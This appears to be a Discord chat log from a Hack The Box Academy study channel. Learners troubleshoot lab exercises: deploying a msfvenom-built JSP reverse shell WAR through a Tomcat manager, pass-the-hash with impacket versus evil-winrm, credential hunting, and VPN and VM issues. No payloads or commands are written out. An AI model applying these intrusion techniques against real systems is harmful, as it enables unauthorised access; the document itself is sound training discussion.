Woo got obsidian with git plugin working on my chromebook

Had to install gnome-keyring for it to store the secrets

Some bullshit

this isn't really the place to discuss that, you should probably just delete your message

why is this not automatically filtered?

<@&861185840277487616>

I'm really sorry.

I still have a question. Is WSL has the same advantage for ethical hacking than VM ?

Just use a VM. Many people run into tons of random little issues with WSL.

Yeah I just found that. Thanks !

yeah no need to share that kinda story in modules tho

hi. still working on the end of module exercise on the shells module

i'm trying to exploit the tomcat server

using a java reverse shell payload

am i on the right track?

Sorry for keeping asking question. I'm still bothered because of the Windows VM problem and the module which give the impression that it's obligatory to have a Windows VM. I tried some research of course but I can't find an answer for the question. Is it obligatory to have a Windows VM for testing exploit ? Google only talk about main OS for ethical hacking

not needed for HTB. HTB Academy provides vm's you can exploit. The only reason you'd setup a Windows VM is for your own home lab and testing.

Hi so in the Password Attacks module in the Pass the Hash section the last question is as follows
Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish.

Can anybody explains to me why the results are like this? for psexec

and evil-winrm works

Okay so I think I will just use Parrot for HTB, and if I'm not mistaken, since I probably need Windows VM for future jobs, I will try to buy a SSD disk for it

You don't need a separate disk for a virtual machine, you just need free space

I don't have enough space for the 104 go of update. I will retry making space but I don't think I can.

Looks like PSExec attempts to write to a share in order to gain a shell, and it's being denied write privileges. evil-winrm uses windows remote management to connect.

Yeah but I wonder how does WinRM gain access then

via windows remote management.

Yeah I mean like how does windows remote management establish a remote shell but thats something for me to google and figure out probably

WinRM is a protocol dedicated to simply just that, remote management. it lets you execute commands, scripts, retrieve data, etc over a network

I'm just interested in knowing how the protocol works like does it just send commands through XML or idk \

https://www.comparitech.com/net-admin/winrm-guide/

For Password Attacks > Credential Hunting in Linux : is it possible, within a reasonable time, to find the user and the password without looking at the hint? how long did it take you?

After gaining the initial foothold then its pretty straight forward to get the hash you need to but getting into the system is the tricky part

feeling a bit stupid. stuck on the end of module exercise. Module shells

trying to exploit the first machine that is running a tomcat server

So far I have tried to upload a webshell. I have also explored the SMB service. successfully created an SMB session

Tricky is not the exact word to define the task, it's more like a pain in the a*s.

What type of shell did you upload

Yeah, it's out of place imo

btw how long did it take to find the right creds?

It's possible, but it would take much longer

i generated a jsp reverse shell file format war

Did you upload it successfully?

no the server refused it

i tried the metasploit module

Do you have the error?

then i tried to generate the file using msfvenom

i didn't really get an error. just when i click deploy on the tomcat manager app, the server timesout

and when you try to navigate to the file, is it not there?

yes

I'm trying to think of something to say that would not spoil it for you

ah ok

But you're on the right track

ok good to know

What page did you upload it to?

maybe i need to find the path

you mean the page for my reverse shell app?

What page on the tomcat website did you upload the file to

/manager/html

Have you completed Attacking Common Applications? The steps outlined there worked.

choose file

then click deploy

It should work then, that's weird

try creating the war file manually instead of using msfvenom

hmmm

is that at me?

msfvenom should work too though

yes

thing is the I don't seem to be able to upload the file

i haven't done attacking common applications

that's a bit later in the path

could try changing regions maybe

or try a different browser if you think its on your end

maybe i'm using the wrong browser

well i'm using the tools on the machine i'm rdp'd into

i used the browser in the burpsuite

maybe i should use the hostname of the server and not the ip when i browse to the url

strange

i get error reading from socket

basically looks like a timeout

as if the upload link behind the upload button doesn't work

give up for today

back tomorrow 🙂

Providing screenshots of the commands etc would make the help easier

footprinting SMTP was a battle jesus

feel like that module really missed the mark with explaining the enumeration phase

It worked fine enough for me

¯_(ツ)_/¯

considering the amount of other people asking in the discord history and forum posts other people would agree

Fair. I'll post some screenshots tomorrow. Got tired of spinning wheels for tonight

anyone else constantly having to reboot target VM's as they die after like 5 minutes

been happening for the past hour for me

my nmap scans will go from showing 5 open ports instantly to none and can only be shown using -Pn and they're listed as filtered.. as soon as i reboot the VM its fixed but then happens again after 5 min

Try a different VPN server?

using the pen box

pwn*

still matters, changing the vpn region changes the pwnbox's region as well

vpn on a vm has the same result

oh i can change the region on my pwnbox?

let me try that thanks

yep

Try to keep VPN and pwnbox near each other, but the VPN selected does have an impact with the pwnbox.

good to know i thought they were completely independant, thank you